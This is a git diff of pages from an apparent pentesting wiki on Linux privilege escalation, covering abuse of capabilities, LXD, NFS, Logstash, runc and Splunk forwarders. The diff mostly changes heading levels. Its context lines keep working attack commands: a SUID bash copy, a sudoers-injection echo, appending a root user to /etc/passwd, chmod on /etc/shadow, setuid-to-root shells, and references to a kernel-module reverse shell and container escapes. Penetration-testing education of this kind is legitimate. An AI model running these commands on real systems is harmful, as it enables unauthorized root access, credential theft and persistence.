```
-#### Dropping capabilities with capsh
+## Dropping capabilities with capsh
If we drop the CAP\_NET\_RAW capabilities for _ping_, then the ping utility should no longer work.
@@ -157,7 +156,7 @@ Besides the output of _capsh_ itself, the _tcpdump_ command itself should also r
The error clearly shows that the ping command is not allowed to open an ICMP socket. Now we know for sure that this works as expected.
-#### Remove Capabilities
+## Remove Capabilities
You can remove capabilities of a binary with
@@ -165,7 +164,7 @@ You can remove capabilities of a binary with
setcap -r
```
-### User Capabilities
+# User Capabilities
Apparently **it's possible to assign capabilities also to users**. This probably means that every process executed by the user will be able to use the users capabilities.\
Base on on [this](https://unix.stackexchange.com/questions/454708/how-do-you-add-cap-sys-admin-permissions-to-user-in-centos-7), [this ](http://manpages.ubuntu.com/manpages/bionic/man5/capability.conf.5.html)and [this ](https://stackoverflow.com/questions/1956732/is-it-possible-to-configure-linux-capabilities-per-user)a few files new to be configured to give a user certain capabilities but the one assigning the capabilities to each user will be `/etc/security/capability.conf`.\
@@ -185,7 +184,7 @@ cap_net_admin,cap_net_raw jrnetadmin
cap_sys_admin,22,25 jrsysadmin
```
-### Environment Capabilities
+# Environment Capabilities
Compiling the following program it's possible to **spawn a bash shell inside an environment that provides capabilities**.
@@ -298,11 +297,11 @@ Current: = cap_net_admin,cap_net_raw,cap_sys_nice+eip
You can **only add capabilities that are present** in both the permitted and the inheritable sets.
{% endhint %}
-#### Capability-aware/Capability-dumb binaries
+## Capability-aware/Capability-dumb binaries
The **capability-aware binaries won't use the new capabilities** given by the environment, however the **capability dumb binaries will us**e them as they won't reject them. This makes capability-dumb binaries vulnerable inside a special environment that grant capabilities to binaries.
-### Service Capabilities
+# Service Capabilities
By default a **service running as root will have assigned all the capabilities**, and in some occasions this may be dangerous.\
Therefore, a **service configuration** file allows to **specify** the **capabilities** you want it to have, **and** the **user** that should execute the service to avoid running a service with unnecessary privileges:
@@ -313,7 +312,7 @@ User=bob
AmbientCapabilities=CAP_NET_BIND_SERVICE
```
-### Capabilities in Docker Containers
+# Capabilities in Docker Containers
By default Docker assigns a few capabilities to the containers. It's very easy to check which capabilities are these by running:
@@ -332,7 +331,7 @@ docker run --rm -it --cap-add=ALL r.j3ss.co/amicontained bash
docker run --rm -it --cap-drop=ALL --cap-add=SYS_PTRACE r.j3ss.co/amicontained bash
```
-## Privesc/Container Escape
+# Privesc/Container Escape
Capabilities are useful when you **want to restrict your own processes after performing privileged operations** (e.g. after setting up chroot and binding to a socket). However, they can be exploited by passing them malicious commands or arguments which are then run as root.
@@ -355,7 +354,7 @@ To identify programs in a system or folder with capabilities:
getcap -r / 2>/dev/null
```
-#### Exploitation example
+## Exploitation example
In the following example the binary `/usr/bin/python2.6` is found vulnerable to privesc:
@@ -375,7 +374,7 @@ getcap /usr/sbin/tcpdump
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+eip
```
-#### The special case of "empty" capabilities
+## The special case of "empty" capabilities
Note that one can assign empty capability sets to a program file, and thus it is possible to create a set-user-ID-root program that changes the effective and saved set-user-ID of the process that executes the program to 0, but confers no capabilities to that process. Or, simply put, if you have a binary that:
@@ -385,7 +384,7 @@ Note that one can assign empty capability sets to a program file, and thus it is
then **that binary will run as root**.
-### CAP\_SYS\_ADMIN
+# CAP\_SYS\_ADMIN
[**CAP\_SYS\_ADMIN**](https://man7.org/linux/man-pages/man7/capabilities.7.html) is largely a catchall capability, it can easily lead to additional capabilities or full root (typically access to all capabilities). `CAP_SYS_ADMIN` is required to perform a range of **administrative operations**, which is difficult to drop from containers if privileged operations are performed within the container. Retaining this capability is often necessary for containers which mimic entire systems versus individual application containers which can be more restrictive. Among other things this allows to **mount devices** or abuse **release\_agent** to escape from the container.
@@ -475,7 +474,7 @@ chroot /mnt/ adduser john
ssh john@172.17.0.1 -p 2222
```
-### CAP\_SYS\_PTRACE
+# CAP\_SYS\_PTRACE
**This means that you can escape the container by injecting a shellcode inside some process running inside the host.** To access processes running inside the host the container needs to be run at least with **`--pid=host`**.
@@ -613,7 +612,7 @@ gdb -p 1234
You won’t be able to see the output of the command executed but it will be executed by that process (so get a rev shell).
-### CAP\_SYS\_MODULE
+# CAP\_SYS\_MODULE
[**CAP\_SYS\_MODULE**](https://man7.org/linux/man-pages/man7/capabilities.7.html) allows the process to load and unload arbitrary kernel modules (`init_module(2)`, `finit_module(2)` and `delete_module(2)` system calls). This could lead to trivial privilege escalation and ring-0 compromise. The kernel can be modified at will, subverting all system security, Linux Security Modules, and container systems.\
**This means that you can** **insert/remove kernel modules in/from the kernel of the host machine.**
@@ -747,7 +746,7 @@ insmod reverse-shell.ko #Launch the reverse shell
Another example of this technique can be found in [https://www.cyberark.com/resources/threat-research-blog/how-i-hacked-play-with-docker-and-remotely-ran-code-on-the-host](https://www.cyberark.com/resources/threat-research-blog/how-i-hacked-play-with-docker-and-remotely-ran-code-on-the-host)
-### CAP\_DAC\_READ\_SEARCH
+# CAP\_DAC\_READ\_SEARCH
[**CAP\_DAC\_READ\_SEARCH**](https://man7.org/linux/man-pages/man7/capabilities.7.html) allows a process to **bypass file read, and directory read and execute permissions**. While this was designed to be used for searching or reading files, it also grants the process permission to invoke `open_by_handle_at(2)`. Any process with the capability `CAP_DAC_READ_SEARCH` can use `open_by_handle_at(2)` to gain access to any file, even files outside their mount namespace. The handle passed into `open_by_handle_at(2)` is intended to be an opaque identifier retrieved using `name_to_handle_at(2)`. However, this handle contains sensitive and tamperable information, such as inode numbers. This was first shown to be an issue in Docker containers by Sebastian Krahmer with [shocker](https://medium.com/@fun\_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3) exploit.\
**This means that you can** **bypass can bypass file read permission checks and directory read/execute permission checks.**
@@ -961,7 +960,7 @@ I exploit needs to find a pointer to something mounted on the host. The original
**The code of this technique was copied from the laboratory of "Abusing DAC\_READ\_SEARCH Capability" from** [**https://www.pentesteracademy.com/**](https://www.pentesteracademy.com)
-### CAP\_DAC\_OVERRIDE
+# CAP\_DAC\_OVERRIDE
**This mean that you can bypass write permission checks on any file, so you can write any file.**
@@ -1151,7 +1150,7 @@ In order to scape the docker container you could **download** the files `/etc/sh
**The code of this technique was copied from the laboratory of "Abusing DAC\_OVERRIDE Capability" from** [**https://www.pentesteracademy.com**](https://www.pentesteracademy.com)
-### CAP\_CHOWN
+# CAP\_CHOWN
**This means that it's possible to change the ownership of any file.**
@@ -1169,7 +1168,7 @@ Or with the **`ruby`** binary having this capability:
ruby -e 'require "fileutils"; FileUtils.chown(1000, 1000, "/etc/shadow")'
```
-### CAP\_FOWNER
+# CAP\_FOWNER
**This means that it's possible to change the permission of any file.**
@@ -1181,7 +1180,7 @@ If python has this capability you can modify the permissions of the shadow file,
python -c 'import os;os.chmod("/etc/shadow",0666)
```
-#### CAP\_SETUID
+## CAP\_SETUID
**This means that it's possible to set the effective user id of the created process.**
@@ -1206,7 +1205,7 @@ os.setuid(0)
os.system("/bin/bash")
```
-### CAP\_SETGID
+# CAP\_SETGID
**This means that it's possible to set the effective group id of the created process.**
@@ -1241,7 +1240,7 @@ cat /etc/shadow
If **docker** is installed you could **impersonate** the **docker group** and abuse it to communicate with the [**docker socket** and escalate privileges](./#writable-docker-socket).
-### CAP\_SETFCAP
+# CAP\_SETFCAP
**This means that it's possible to set capabilities on files and processes**
@@ -1319,13 +1318,13 @@ However, Docker also grants the **CAP\_SETPCAP** by default, so you might be abl
However, in the documentation of this cap: _CAP\_SETPCAP : \[…] **add any capability from the calling thread’s bounding** set to its inheritable set_.\
It looks like we can only add to the inheritable set capabilities from the bounding set. Which means that **we cannot put new capabilities like CAP\_SYS\_ADMIN or CAP\_SYS\_PTRACE in the inherit set to escalate privileges**.
-### CAP\_SYS\_RAWIO
+# CAP\_SYS\_RAWIO
[**CAP\_SYS\_RAWIO**](https://man7.org/linux/man-pages/man7/capabilities.7.html) provides a number of sensitive operations including access to `/dev/mem`, `/dev/kmem` or `/proc/kcore`, modify `mmap_min_addr`, access `ioperm(2)` and `iopl(2)` system calls, and various disk commands. The `FIBMAP ioctl(2)` is also enabled via this capability, which has caused issues in the [past](http://lkml.iu.edu/hypermail/linux/kernel/9907.0/0132.html). As per the man page, this also allows the holder to descriptively `perform a range of device-specific operations on other devices`.
This can be useful for **privilege escalation** and **Docker breakout.**
-### CAP\_KILL
+# CAP\_KILL
**This means that it's possible to kill any process.**
@@ -1354,7 +1353,7 @@ kill -s SIGUSR1
[electron-cef-chromium-debugger-abuse.md](electron-cef-chromium-debugger-abuse.md)
{% endcontent-ref %}
-### CAP\_NET\_BIND\_SERVICE
+# CAP\_NET\_BIND\_SERVICE
**This means that it's possible to listen in any port (even in privileged ones).** You cannot escalate privileges directly with this capability.
@@ -1386,7 +1385,7 @@ s.connect(('10.10.10.10',500))
{% endtab %}
{% endtabs %}
-### CAP\_NET\_RAW
+# CAP\_NET\_RAW
[**CAP\_NET\_RAW**](https://man7.org/linux/man-pages/man7/capabilities.7.html) allows a process to be able to **create RAW and PACKET socket types** for the available network namespaces. This allows arbitrary packet generation and transmission through the exposed network interfaces. In many cases this interface will be a virtual Ethernet device which may allow for a malicious or **compromised container** to **spoof** **packets** at various network layers. A malicious process or compromised container with this capability may inject into upstream bridge, exploit routing between containers, bypass network access controls, and otherwise tamper with host networking if a firewall is not in place to limit the packet types and contents. Finally, this capability allows the process to bind to any address within the available namespaces. This capability is often retained by privileged containers to allow ping to function by using RAW sockets to create ICMP requests from a container.
@@ -1451,7 +1450,7 @@ while True:
count=count+1
```
-### CAP\_NET\_ADMIN + CAP\_NET\_RAW
+# CAP\_NET\_ADMIN + CAP\_NET\_RAW
[**CAP\_NET\_ADMIN**](https://man7.org/linux/man-pages/man7/capabilities.7.html) allows the capability holder to **modify the exposed network namespaces' firewall, routing tables, socket permissions**, network interface configuration and other related settings on exposed network interfaces. This also provides the ability to **enable promiscuous mode** for the attached network interfaces and potentially sniff across namespaces.
@@ -1471,7 +1470,7 @@ import iptc
iptc.easy.flush_table('filter')
```
-### CAP\_LINUX\_IMMUTABLE
+# CAP\_LINUX\_IMMUTABLE
**This means that it's possible modify inode attributes.** You cannot escalate privileges directly with this capability.
@@ -1511,20 +1510,20 @@ sudo chattr -i file.txt
```
{% endhint %}
-### CAP\_SYS\_CHROOT
+# CAP\_SYS\_CHROOT
[**CAP\_SYS\_CHROOT**](https://man7.org/linux/man-pages/man7/capabilities.7.html) permits the use of the `chroot(2)` system call. This may allow escaping of any `chroot(2)` environment, using known weaknesses and escapes:
* [How to break out from various chroot solutions](https://deepsec.net/docs/Slides/2015/Chw00t\_How\_To\_Break%20Out\_from\_Various\_Chroot\_Solutions\_-\_Bucsay\_Balazs.pdf)
* [chw00t: chroot escape tool](https://github.com/earthquake/chw00t/)
-### CAP\_SYS\_BOOT
+# CAP\_SYS\_BOOT
[**CAP\_SYS\_BOOT**](https://man7.org/linux/man-pages/man7/capabilities.7.html) allows to use the `reboot(2)` syscall. It also allows for executing an arbitrary **reboot command** via `LINUX_REBOOT_CMD_RESTART2`, implemented for some specific hardware platforms.
This capability also permits use of the `kexec_load(2)` system call, which loads a new crash kernel and as of Linux 3.17, the `kexec_file_load(2)` which also will load signed kernels.
-### CAP\_SYSLOG
+# CAP\_SYSLOG
[CAP\_SYSLOG](https://man7.org/linux/man-pages/man7/capabilities.7.html) was finally forked in Linux 2.6.37 from the `CAP_SYS_ADMIN` catchall, this capability allows the process to use the `syslog(2)` system call. This also allows the process to view kernel addresses exposed via `/proc` and other interfaces when `/proc/sys/kernel/kptr_restrict` is set to 1.
@@ -1532,7 +1531,7 @@ The `kptr_restrict` sysctl setting was introduced in 2.6.38, and determines if k
In addition, this capability also allows the process to view `dmesg` output, if the `dmesg_restrict` setting is 1. Finally, the `CAP_SYS_ADMIN` capability is still permitted to perform `syslog` operations itself for historical reasons.
-## References
+# References
**Most of these examples were taken from some labs of** [**https://attackdefense.pentesteracademy.com/**](https://attackdefense.pentesteracademy.com), so if you want to practice this privesc techniques I recommend these labs.
diff --git a/linux-unix/privilege-escalation/logstash.md b/linux-unix/privilege-escalation/logstash.md
index 58a05962..5d8bc3d7 100644
--- a/linux-unix/privilege-escalation/logstash.md
+++ b/linux-unix/privilege-escalation/logstash.md
@@ -17,13 +17,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Logstash
-
-## Basic Information
+# Basic Information
Logstash is used for collecting, transforming and outputting logs. This is realized by using **pipelines**, which contain input, filter and output modules. The service gets interesting when having compromised a machine which is running Logstash as a service.
-### Pipelines
+## Pipelines
The pipeline configuration file **/etc/logstash/pipelines.yml** specifies the locations of active pipelines:
@@ -41,7 +39,7 @@ The pipeline configuration file **/etc/logstash/pipelines.yml** specifies the lo
In here you can find the paths to the **.conf** files, which contain the configured pipelines. If the **Elasticsearch output module** is used, **pipelines** are likely to **contain** valid **credentials** for an Elasticsearch instance. Those credentials have often more privileges, since Logstash has to write data to Elasticsearch. If wildcards are used, Logstash tries to run all pipelines located in that folder matching the wildcard.
-### Privesc with writable pipelines
+## Privesc with writable pipelines
Before trying to elevate your own privileges you should check which user is running the logstash service, since this will be the user, you will be owning afterwards. Per default the logstash service runs with the privileges of the **logstash** user.
@@ -79,7 +77,7 @@ If **/etc/logstash/logstash.yml** contains the entry **config.reload.automatic:
If no wildcard is used, you can apply those changes to an existing pipeline configuration. **Make sure you do not break things!**
-## References
+# References
* [https://insinuator.net/2021/01/pentesting-the-elk-stack/](https://insinuator.net/2021/01/pentesting-the-elk-stack/)
diff --git a/linux-unix/privilege-escalation/lxd-privilege-escalation.md b/linux-unix/privilege-escalation/lxd-privilege-escalation.md
index 4de9c264..6326fd00 100644
--- a/linux-unix/privilege-escalation/lxd-privilege-escalation.md
+++ b/linux-unix/privilege-escalation/lxd-privilege-escalation.md
@@ -17,11 +17,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# lxc - Privilege escalation
-
If you belong to _**lxd**_ **or** _**lxc**_ **group**, you can become root
-## Exploiting without internet
+# Exploiting without internet
You can install in your machine this distro builder: [https://github.com/lxc/distrobuilder ](https://github.com/lxc/distrobuilder)\(follow the instructions of the github\):
@@ -69,7 +67,7 @@ lxc exec privesc /bin/sh
[email protected]:~# cd /mnt/root #Here is where the filesystem is mounted
```
-## With internet
+# With internet
You can follow [these instructions](https://reboare.github.io/lxd/lxd-escape.html).
@@ -81,7 +79,7 @@ lxc exec test bash
[email protected]:~# cd /mnt/root #Here is where the filesystem is mounted
```
-## Other Refs
+# Other Refs
{% embed url="https://reboare.github.io/lxd/lxd-escape.html" caption="" %}
diff --git a/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md b/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md
index 8c0bdc99..b97a8063 100644
--- a/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md
+++ b/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md
@@ -17,17 +17,15 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# NFS no\_root\_squash/no\_all\_squash misconfiguration PE
-
Read the _ **/etc/exports** _ file, if you find some directory that is configured as **no\_root\_squash**, then you can **access** it from **as a client** and **write inside** that directory **as** if you were the local **root** of the machine.
**no\_root\_squash**: This option basically gives authority to the root user on the client to access files on the NFS server as root. And this can lead to serious security implications.
**no\_all\_squash:** This is similar to **no\_root\_squash** option but applies to **non-root users**. Imagine, you have a shell as nobody user; checked /etc/exports file; no\_all\_squash option is present; check /etc/passwd file; emulate a non-root user; create a suid file as that user (by mounting using nfs). Execute the suid as nobody user and become different user.
-## Privilege Escalation
+# Privilege Escalation
-### Remote Exploit
+## Remote Exploit
If you have found this vulnerability, you can exploit it:
@@ -62,7 +60,7 @@ cd
./payload #ROOT shell
```
-### Local Exploit
+## Local Exploit
{% hint style="info" %}
Note that if you can create a **tunnel from your machine to the victim machine you can still use the Remote version to exploit this privilege escalation tunnelling the required ports**.\
@@ -89,7 +87,7 @@ This exploit relies on a problem in the NFSv3 specification that mandates that i
Here’s a [library that lets you do just that](https://github.com/sahlberg/libnfs).
-#### Compiling the example
+### Compiling the example
Depending on your kernel, you might need to adapt the example. In my case I had to comment out the fallocate syscalls.
@@ -100,7 +98,7 @@ make
gcc -fPIC -shared -o ld_nfs.so examples/ld_nfs.c -ldl -lnfs -I./include/ -L./lib/.libs/
```
-#### Exploiting using the library
+### Exploiting using the library
Let’s use the simplest of exploits:
@@ -128,7 +126,7 @@ All that’s left is to launch it:
There we are, local root privilege escalation!
-### Bonus NFShell
+## Bonus NFShell
Once local root on the machine, I wanted to loot the NFS share for possible secrets that would let me pivot. But there were many users of the share all with their own uids that I couldn’t read despite being root because of the uid mismatch. I didn’t want to leave obvious traces such as a chown -R, so I rolled a little snippet to set my uid prior to running the desired shell command:
diff --git a/linux-unix/privilege-escalation/pam-pluggable-authentication-modules.md b/linux-unix/privilege-escalation/pam-pluggable-authentication-modules.md
index b21134fc..c7822ea4 100644
--- a/linux-unix/privilege-escalation/pam-pluggable-authentication-modules.md
+++ b/linux-unix/privilege-escalation/pam-pluggable-authentication-modules.md
@@ -17,11 +17,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# PAM - Pluggable Authentication Modules
-
PAM is a collection of modules that essentially form a barrier between a service on your system, and the user of the service. The modules can have widely varying purposes, from disallowing a login to users from a particular UNIX group \(or netgroup, or subnet…\), to implementing resource limits so that your ‘research’ group can’t hog system resources.
-## Config Files
+# Config Files
Solaris and other commercial UNIX systems have a slightly different configuration model, centered around a single file, **`/etc/pam.conf`**. On most Linux systems, these configuration files live in **`/etc/pam.d`**, and are named after the service – for example, the ‘login’ configuration file is called **`/etc/pam.d/login`**. Let’s have a quick look at a version of that file:
@@ -38,7 +36,7 @@ password required /lib/security/pam_pwdb.so use_first_pass
session required /lib/security/pam_unix_session.so
```
-### **PAM Management Realms**
+## **PAM Management Realms**
The leftmost column can contains four unique words, which represent four realms of PAM management: **auth**, **account**, **password** and **session**. While there are many modules which support more than one of these realms \(indeed, pam\_unix supports all of them\), others, like pam\_cracklib for instance, are only suited for one \(the ‘password’ facility in pam\_cracklib’s case\).
@@ -47,7 +45,7 @@ The leftmost column can contains four unique words, which represent four realms
* **password**: The modules in this area are responsible for any functionality needed in the course of **updating passwords** for a given service. Most of the time, this section is pretty ‘ho-hum’, simply calling a module that **will prompt for a current password**, and, assuming that’s successful, prompt you for a new one. Other modules could be added to perform **password complexity** or dictionary checking as well, such as that performed by the pam\_cracklib and pam\_pwcheck modules.
* **session**: Modules in this area perform any number of things that happen either **during the setup or cleanup of a service** for a given user. This may include any number of things; launching a system-wide initialization script, performing special logging, **mounting the user’s home directory**, or setting resource limits.
-### **PAM Module Controls**
+## **PAM Module Controls**
The **middle column** holds a keyword that essentially determines w**hat PAM should do if the module either succeeds or fails**. These keywords are called ‘**controls**’ in PAM-speak. In 90% of the cases, you can use one of the common keywords \(**requisite**, **required**, **sufficient** or **optional**\). However, this is only the tip of the iceberg in terms of unleashing the flexibility and power of PAM.
@@ -56,7 +54,7 @@ The **middle column** holds a keyword that essentially determines w**hat PAM sho
* **sufficient**: If a **sufficient** module **succeeds**, it is enough to satisfy the requirements of sufficient modules in that realm for use of the service, and **modules below it that are also listed as ‘sufficient’ are not invoked**. **If it fails, the operation fails unless a module invoked after it succeeds**.
* **optional**: An ''optional’ module, according to the pam\(8\) manpage, **will only cause an operation to fail if it’s the only module in the stack for that facility**.
-### Example
+## Example
In our example file, we have four modules stacked for the auth realm:
diff --git a/linux-unix/privilege-escalation/payloads-to-execute.md b/linux-unix/privilege-escalation/payloads-to-execute.md
index dcd0016e..aada4dd6 100644
--- a/linux-unix/privilege-escalation/payloads-to-execute.md
+++ b/linux-unix/privilege-escalation/payloads-to-execute.md
@@ -17,16 +17,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Payloads to execute
-
-## Bash
+# Bash
```bash
cp /bin/bash /tmp/b && chmod +s /tmp/b
/bin/b -p #Maintains root privileges from suid, working in debian & buntu
```
-## C
+# C
```c
//gcc payload.c -o payload
@@ -50,16 +48,16 @@ int main(){
}
```
-## Overwriting a file to escalate privileges
+# Overwriting a file to escalate privileges
-### Common files
+## Common files
* Add user with password to _/etc/passwd_
* Change password inside _/etc/shadow_
* Add user to sudoers in _/etc/sudoers_
* Abuse docker through the docker socket, usually in _/run/docker.sock_ or _/var/run/docker.sock_
-### Overwriting a library
+## Overwriting a library
Check a library used by some binary, in this case `/bin/su`:
@@ -112,29 +110,29 @@ void inject()
Now, just calling **`/bin/su`** you will obtain a shell as root.
-## Scripts
+# Scripts
Can you make root execute something?
-### **www-data to sudoers**
+## **www-data to sudoers**
```bash
echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
```
-### **Change root password**
+## **Change root password**
```bash
echo "root:hacked" | chpasswd
```
-### Add new root user to /etc/passwd
+## Add new root user to /etc/passwd
```bash
echo hacker:$((mkpasswd -m SHA-512 myhackerpass || openssl passwd -1 -salt mysalt myhackerpass || echo '$1$mysalt$7DTZJIc9s6z60L6aj0Sui.') 2>/dev/null):0:0::/:/bin/bash >> /etc/passwd
```
-###
+##
diff --git a/linux-unix/privilege-escalation/runc-privilege-escalation.md b/linux-unix/privilege-escalation/runc-privilege-escalation.md
index 76cd1916..e1d9a52b 100644
--- a/linux-unix/privilege-escalation/runc-privilege-escalation.md
+++ b/linux-unix/privilege-escalation/runc-privilege-escalation.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# RunC Privilege Escalation
-
-## Basic information
+# Basic information
If you want to learn more about **runc** check the following page:
@@ -27,7 +25,7 @@ If you want to learn more about **runc** check the following page:
[2375-pentesting-docker.md](../../pentesting/2375-pentesting-docker.md)
{% endcontent-ref %}
-## PE
+# PE
If you find that `runc` is installed in the host you may be able to **run a container mounting the root / folder of the host**.
diff --git a/linux-unix/privilege-escalation/seccomp.md b/linux-unix/privilege-escalation/seccomp.md
index ca606d69..cb2be364 100644
--- a/linux-unix/privilege-escalation/seccomp.md
+++ b/linux-unix/privilege-escalation/seccomp.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Seccomp
-
-## Basic Information
+# Basic Information
**Seccomp **or Secure Computing mode, in summary, is a feature of Linux kernel which can act as **syscall filter**.\
Seccomp has 2 modes.
@@ -30,7 +28,7 @@ seccomp mode is **enabled via the `prctl(2)` system call** using the `PR_SET_SEC
**seccomp-bpf** is an extension to seccomp that allows **filtering of system calls using a configurable policy** implemented using Berkeley Packet Filter rules. It is used by OpenSSH and vsftpd as well as the Google Chrome/Chromium web browsers on Chrome OS and Linux. (In this regard seccomp-bpf achieves similar functionality, but with more flexibility and higher performance, to the older systrace—which seems to be no longer supported for Linux.)
-### **Original/Strict Mode**
+## **Original/Strict Mode**
In this mode** **Seccomp **only allow the syscalls** `exit()`, `sigreturn()`, `read()` and `write()` to already-open file descriptors. If any other syscall is made, the process is killed using SIGKILL
@@ -68,7 +66,7 @@ int main(int argc, char **argv)
```
{% endcode %}
-### Seccomp-bpf
+## Seccomp-bpf
This mode allows f**iltering of system calls using a configurable policy** implemented using Berkeley Packet Filter rules.
@@ -122,7 +120,7 @@ void main(void) {
```
{% endcode %}
-## Seccomp in Docker
+# Seccomp in Docker
**Seccomp-bpf** is supported by **Docker **to restrict the **syscalls **from the containers effectively decreasing the surface area. You can find the **syscalls blocked **by **default **in [https://docs.docker.com/engine/security/seccomp/](https://docs.docker.com/engine/security/seccomp/) and the **default seccomp profile **can be found here [https://github.com/moby/moby/blob/master/profiles/seccomp/default.json](https://github.com/moby/moby/blob/master/profiles/seccomp/default.json).\
You can run a docker container with a **different seccomp** policy with:
@@ -146,7 +144,7 @@ docker run -it --security-opt seccomp=default.json modified-ubuntu strace uname
If you are using **Docker just to launch an application**, you can **profile** it with **`strace`** and **just allow the syscalls** it needs
{% endhint %}
-### Deactivate it in Docker
+## Deactivate it in Docker
Launch a container with the flag: **`--security-opt seccomp=unconfined`**
diff --git a/linux-unix/privilege-escalation/selinux.md b/linux-unix/privilege-escalation/selinux.md
index 53496a99..61517e33 100644
--- a/linux-unix/privilege-escalation/selinux.md
+++ b/linux-unix/privilege-escalation/selinux.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# SELinux
-
-## SELinux in Containers
+# SELinux in Containers
[SELinux](https://www.redhat.com/en/blog/latest-container-exploit-runc-can-be-blocked-selinux) is a **labeling** **system**. Every **process** and every **file** system object has a **label**. SELinux policies define rules about what a **process label is allowed to do with all of the other labels** on the system.
@@ -33,7 +31,7 @@ LABEL
system_u:system_r:container_t:s0:c647,c780
```
-## SELinux Users
+# SELinux Users
There are SELinux users in addition to the regular Linux users. SELinux users are part of an SELinux policy. Each Linux user is mapped to a SELinux user as part of the policy. This allows Linux users to inherit the restrictions and security rules and mechanisms placed on SELinux users.
diff --git a/linux-unix/privilege-escalation/socket-command-injection.md b/linux-unix/privilege-escalation/socket-command-injection.md
index 73277465..20e7efcd 100644
--- a/linux-unix/privilege-escalation/socket-command-injection.md
+++ b/linux-unix/privilege-escalation/socket-command-injection.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Socket Command Injection
-
-### Socket binding example with Python
+## Socket binding example with Python
In the following example a **unix socket is created** (`/tmp/socket_test.s`) and everything **received** is going to be **executed** by `os.system`.I know that you aren't going to find this in the wild, but the goal of this example is to see how a code using unix sockets looks like, and how to manage the input in the worst case possible.
diff --git a/linux-unix/privilege-escalation/splunk-lpe-and-persistence.md b/linux-unix/privilege-escalation/splunk-lpe-and-persistence.md
index 5977a064..9d7ce807 100644
--- a/linux-unix/privilege-escalation/splunk-lpe-and-persistence.md
+++ b/linux-unix/privilege-escalation/splunk-lpe-and-persistence.md
@@ -17,8 +17,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Splunk LPE and Persistence
-
If **enumerating** a machine **internally** or **externally** you find **Splunk running** (port 8090), if you luckily know any **valid credentials** you can **abuse the Splunk service** to **execute a shell** as the user running Splunk. If root is running it, you can escalate privileges to root.
Also if you are **already root and the Splunk service is not listening only on localhost**, you can **steal** the **password** file **from** the Splunk service and **crack** the passwords, or **add new** credentials to it. And maintain persistence on the host.
@@ -27,11 +25,11 @@ In the first image below you can see how a Splunkd web page looks like.
**The following information was copied from** [**https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/**](https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/)
-## Abusing Splunk Forwarders For Shells and Persistence
+# Abusing Splunk Forwarders For Shells and Persistence
14 Aug 2020
-### Description:
+## Description:
The Splunk Universal Forwarder Agent (UF) allows authenticated remote users to send single commands or scripts to the agents through the Splunk API. The UF agent doesn’t validate connections coming are coming from a valid Splunk Enterprise server, nor does the UF agent validate the code is signed or otherwise proven to be from the Splunk Enterprise server. This allows an attacker who gains access to the UF agent password to run arbitrary code on the server as SYSTEM or root, depending on the operating system.
@@ -39,7 +37,7 @@ This attack is being used by Penetration Testers and is likely being actively ex
Splunk UF passwords are relatively easy to acquire, see the secion Common Password Locations for details.
-### Context:
+## Context:
Splunk is a data aggregation and search tool often used as a Security Information and Event Monitoring (SIEM) system. Splunk Enterprise Server is a web application which runs on a server, with agents, called Universal Forwarders, which are installed on every system in the network. Splunk provides agent binaries for Windows, Linux, Mac, and Unix. Many organizations use Syslog to send data to Splunk instead of installing an agent on Linux/Unix hosts but agent installation is becomming increasingly popular.
@@ -49,7 +47,7 @@ Universal Forwarder is accessible on each host at https://host:8089. Accessing a
Splunk documentaiton shows using the same Universal Forwarding password for all agents, I don’t remember for sure if this is a requirement or if individual passwords can be set for each agent, but based on documentaiton and memory from when I was a Splunk admin, I believe all agents must use the same password. This means if the password is found or cracked on one system, it is likely to work on all Splunk UF hosts. This has been my personal experience, allowing compromise of hundreds of hosts quickly.
-### Common Password Locations
+## Common Password Locations
I often find the Splunk Universal Forwarding agent plain text password in the following locations on networks:
@@ -59,7 +57,7 @@ I often find the Splunk Universal Forwarding agent plain text password in the fo
The password can also be accessed in hashed form in Program Files\Splunk\etc\passwd on Windows hosts, and in /opt/Splunk/etc/passwd on Linux and Unix hosts. An attacker can attempt to crack the password using Hashcat, or rent a cloud cracking environment to increase liklihood of cracking the hash. The password is a strong SHA-256 hash and as such a strong, random password is unlikely to be cracked.
-### Impact:
+## Impact:
An attacker with a Splunk Universal Forward Agent password can fully compromise all Splunk hosts in the network and gain SYSTEM or root level permissions on each host. I have successfully used the Splunk agent on Windows, Linux, and Solaris Unix hosts. This vulnerability could allow system credentials to be dumped, sensitive data to be exfiltrated, or ransomware to be installed. This vulnerability is fast, easy to use, and reliable.
@@ -69,7 +67,7 @@ Splunk Universal Forwarder is often seen installed on Domain Controllers for log
Finally, the Universal Forwarding Agent does not require a license, and can be configured with a password stand alone. As such an attacker can install Universal Forwarder as a backdoor persistence mechanism on hosts, since it is a legitimate application which customers, even those who do not use Splunk, are not likely to remove.
-### Evidence:
+## Evidence:
To show an exploitation example I set up a test environment using the latest Splunk version for both the Enterprise Server and the Universal Forwarding agent. A total of 10 images have been attached to this report, showing the following:
@@ -133,7 +131,7 @@ Attacker:192.168.42.51
Splunk Enterprise version: 8.0.5 (latest as of August 12, 2020 – day of lab setup)\
Universal Forwarder version: 8.0.5 (latest as of August 12, 2020 – day of lab setup)
